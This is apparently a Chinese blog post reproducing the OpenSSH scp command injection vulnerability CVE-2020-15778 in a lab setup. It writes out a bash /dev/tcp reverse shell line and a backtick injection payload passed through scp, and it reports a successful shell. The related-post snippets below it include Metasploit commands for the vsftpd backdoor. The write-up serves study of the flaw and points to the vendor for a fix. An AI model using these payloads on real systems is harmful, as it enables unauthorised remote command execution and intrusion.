centos7输入shell找不到命令_CVE202015778 OpensshSCP 命令注入漏洞复现

最新推荐文章于 2024-04-29 17:54:30 发布
最新推荐文章于 2024-04-29 17:54:30 发布
阅读量300 收藏
点赞数
文章标签: centos7输入shell找不到命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34446948/article/details/112231885
版权

刚刚好这几遇见了不少OPENSSH命中该漏洞版本的就复现一下。

本文参考字节脉搏等 字节脉搏EXP调用失败可能为环境问题。

感谢福林表哥提供第二个exp 反弹shell成功。

01漏洞介绍

CVE编号:CVE-2020-15778

发布时间:2020-07-24

危害等级:高危

漏洞版本:<= openssh-8.3p1

漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

参考链接来自CNNVD

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202007-1519

02环境准备

一台centos7  一台kali  一台公网vps (反弹shell用)

b70a0f8cbd3650d7ffb44eb1a8c0104d.png

03复现开始

 测试scp是否能连上 编写一个txt 然后连接环境

94a7102ebe101e5ffcf79a1d145a5dcd.png

scp 1.txt root@IP:/tmp/1.txt  | 测试传到tmp下1.txt 测试成功

35d7964389c24749b1bbc139403436ce.png

2b22349e8da580f186a4cf36e78406cf.png

编写反弹shell 语句 最简单的

bash -i >& /dev/tcp/IP/端口 0>&1

服务器监听端口

150f56c1b76a52a4b8139be773712d2d.png

首先 需要给1.sh权限 直接777吧

4d6b6106340daab4e7f0076e4db9050c.png

然后首先需要把1.sh传上去 才可以进行下一步

d469ebf1ab4664a049563096d8b2e814.png

调用字节脉搏的exp 报错的异常 有点看不懂

scp 1.sh root@IP:/’`sh /tmp/1.sh`’

71f7cff2f463725e61b90014dc6f4d21.png

然后联系了一下福林表哥 换了一个exp 成功 由于不确定是否是公开的先隐藏把 

4da81b1d58af84e1d3cf48044f566847.png

看公网服务器的监听 反弹shell成功

cc8318e07f90bf9588d81eb9e32a38ab.png

04实验总结

个人看法 利用过于鸡肋 绕过拿到ssh密码了 一般是可以直连的,当然如果打CTF之类的比赛的话 当我没说 

05安全建议

官方尚未发布安全更新补丁密切关注厂商主页获取解决办法:

http://www.openssh.com/portable.html

如果对你有用 不如点个关注 转发一下文章

欢迎大佬们加好友吹水聊天

967cb2639714e1f4145e611884762629.png

水妹子
关注
OpenSSH命令注入漏洞复现(CVE-2020-15778)
千寻的博客
03-06 1万+
漏洞名称 OpenSSH命令注入漏洞 漏洞编号 CVE-2020-15778 漏洞描述 OpenSSH8.3p1及之前版本中scpscp.c文件存在操作系统命令注入漏洞。 该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。 攻击者可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshellOpenSSH简介 OpenSSH是 SSH(Secure SHell) 协议的免费开源实现。
CVE-2020-15778漏洞复现 OpenSSH命令注入(环境搭建+命令执行+反弹shell
ch4nge
10-27 3134
CVE-2020-15778漏洞复现学习 作者:ch4nge 漏洞名称: OpenSSH 命令注入漏洞(CVE-2020-15778) 等级: 高危 类型:命令执行 影响版本: OpenSSH <= 8.3p1 利用难度:简单 漏洞介绍 漏洞公开披露2020年7月18日,openssh 8.3p1的SCP命令存在命令注入漏洞,攻击者可以利用此漏洞执行任意命令。 1. scp命令 简单来说就是A这里执行scp命令,将A电脑里的文件传输到B电脑(linux系统) 命令格式 scp [参数] [原路径] [
openssh安装_CVE202015778OpenSSH命令注入漏洞复现
weixin_39577422的博客
12-06 325
上方蓝色字体关注我们,一起学安全!作者:Menge&小泫@Timeline Sec本文字数:1160阅读时长:3~4min声明:请勿用作违法用途,否则后果自负0x01 简介OpenSSH是SSH(SecureSHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, sc...
git常用命令总结
weixin_48718444的博客
10-29 104
一、 git init 初始化空的 git仓库 二、配置 git config --list 显示当前的git 配置 git config -e – [各种配置文件] 编辑git 配置文件 三 、增加/删除文件 git add +文件名 添加文件到暂存区 rm +文件名 删除工作区文件,并且将这次删除放入暂存区 (1)确实删除就 先 git rm 文件 再 git commit (2)想撤销就用git checkout 文件名 四 、代码提交 git commit -m " " 将暂存
CentOS远程执行漏洞
时光途径
11-20 3513
完整标题:CentOS Web Panel Root帐户接管&lt;= v0.9.8.740远程命令执行漏洞利用 添加日期:2018年11月5日 类别:远程执行漏洞 CVE:CVE-2018-18773,CVE-2018-18772,CVE-2018-18774 平台:PHP 原创作者:InfinitumIT 攻击载荷代码: [+] Title: CentOS Web Panel ...
CentOS7系统升级OpenSSH-修复低版本CVE漏洞
weixin_36740201的博客
06-08 568
1、查看当前版本 ssh-V 2、下载相关依赖包 1 yuminstall-y gcc openssl-devel pam-devel rpm-build 3、下载安装包 openssh-8.6p1.tar.gz 1 wget http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.6p1.tar.gz 4...
linux scp命令不到,bashscp:未命令的解决方法-linux运维
weixin_42477197的博客
05-14 2080
scp命令用于通过ssh在两台服务器之间传输文件。大多数scp用户在系统中已经可以使用scp命令,但它仍然显示“bash:scp:command not found”。因此注意,scp命令必须在本地和远程系统上都可用才可以避免这个问题。安装SCP命令scp命令来自Red Hat系统上的openssh-clients软件包,openssh-client软件包用于基于Debian的系统。可以使用以下...
CVE-2021-21315 NodeJs命令注入漏洞复现
wurisansheng的博客
10-11 1335
一、简介: Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http包含了和http相关的很多函数,帮助开发者对http、tcp、udp等进行操作或创建相关服务器。 二、漏洞描述: Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统
OpenSSH 命令注入漏洞(CVE-2020-15778)复现
热门推荐
weixin_47531489的博客
07-20 1万+
1 简介 OpenSSH是SSH(SecureSHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 2 漏洞概述 该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 漏洞等.
【Linux】kaili实现CVE-2019-5736漏洞复现
最新发布
2302_76195174的博客
04-29 1596
Docker逃逸是一个安全问题,指的是攻击者从Docker容器逃逸到宿主机系统,获取更高的权限,从而控制整个系统。下面我将详细介绍Docker逃逸的原理、常见方法以及如何防范。
CentOS 7 下 通过shell + expect 实现 scp 文件(目录)传输
u013204013的博客
03-08 3423
scp介绍: 实现终端之间文件的传输,即可以将本地文件发送到远端相应目录下,也可以将远端目录下的文件拷贝到当前目录 SYNOPSIS      scp [-12346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file] [-l limit] [-o ssh_option] [-P port] [-S program] [[user@]h
dvwa command injection(命令注入)
一个安全研究员
05-15 2673
0x1 命令执行漏洞的产生原因一般就是将用户输入未经过滤或者过滤不严就直接当作系统命令进行执行,我们可以通过批处理中的一些技巧来一次执行多条命令,这样就可以执行任意命令。在命令执行中,常用的命令连接符号有四个:&amp;amp;&amp;amp; &amp;amp; || | ; &amp;amp;&amp;amp;:前一个指令执行成功,后面的指令才继续执行,就像进行与操作一样 ||:前一个命令执行失败,后面的才继续执行,类似于或...
Centos7配置SSH、SCP、SFTP服务(详解)
博海先森
03-24 5027
1.OpenSSH服务的配置 SSH(Secure Shell)是一种安全通道协议,主要用来实现字符界面的远程登陆、远程复制等功能,SSH协议对通讯双方的数据传输进行了加密处理,其中包括用户登陆时输入的Password,与早期的Telnet(远程登陆)相比SSH具有更好的安全性。 在Centos7.3系统,Openssh服务器由opensshOpenssh-server等软件包提供(其实默认已...
OpenSSH 8.0 发布,修复 SCP 存在 35 年的漏洞
weixin_34198881的博客
04-19 807
OpenSSH 8.0 发布了,此版本缓解了 scp(1) 工具和协议漏洞 CVE-2019-6111,该漏洞此前我们之前报导过:知名文件传输协议 SCP 被曝存在 35 年历史的安全漏...
命令注入_漏洞修复——OpenSSH 命令注入漏洞
weixin_39715538的博客
12-30 1237
CNNVD编号:CNNVD-202007-1519危害等级:高危CVE编号:CVE-2020-15778漏洞类型:操作系统命令注入发布时间:2020-07-24威胁类型:本地更新时间:2020-11-13漏洞简介OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传...
命令执行漏洞攻击
qq_43776408的博客
11-06 487
nmap -sT -A -P0 192.168.43.135 search vsftpd use exploit/unix/ftp/vsftpd_234_backdoor show payloads set payload cmd/unix/interact show options set RHOST 192.168.43.135 exploit 以上这种攻击被称为命令执行漏洞攻...
漏洞库:爬取CNNVD-国家信息安全漏洞
KEY0NE的个人博客
11-13 3470
CNNVD相对CNVD的爬取更简单一点,当前并未遇到明显的爬虫限制机制初步分析首先,还是使用我钟爱的爬虫框架——pyspider,选取first page作为起始页http://www.cnnvd.org.cn/web/vulnerability/querylist.tagCNNVD的页面只需要提交get请求即可递归访问到下一页下面进入到漏洞详情页,抓取需要的信息...
centos ssh命令不到?重装ssh服务?和xshell连接不上虚拟机?
BigData_C的博客
08-03 1841
xshell外链软件连接不上虚拟机,解决方法。
Centos下使用scp传输文件
在努力!
11-09 5107
//对于只需要密码的机器 scp xx(文件名) 172.18.31.xx:/home/xxx//对于需要密钥的 scp -i xxx.key xxx(文件名) 172.18.31.xxx:/home/xxx
CentOS Linux Shell命令实例大全
"这是一本全面的CentOS (Linux) Shell命令实例手册,涵盖了各种常用的Shell命令、语法、环境配置、MySQL、JDK、Hadoop、HDFS、Keepalive、文件操作、软件安装、系统管理、权限控制、服务管理、网络配置、磁盘管理等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值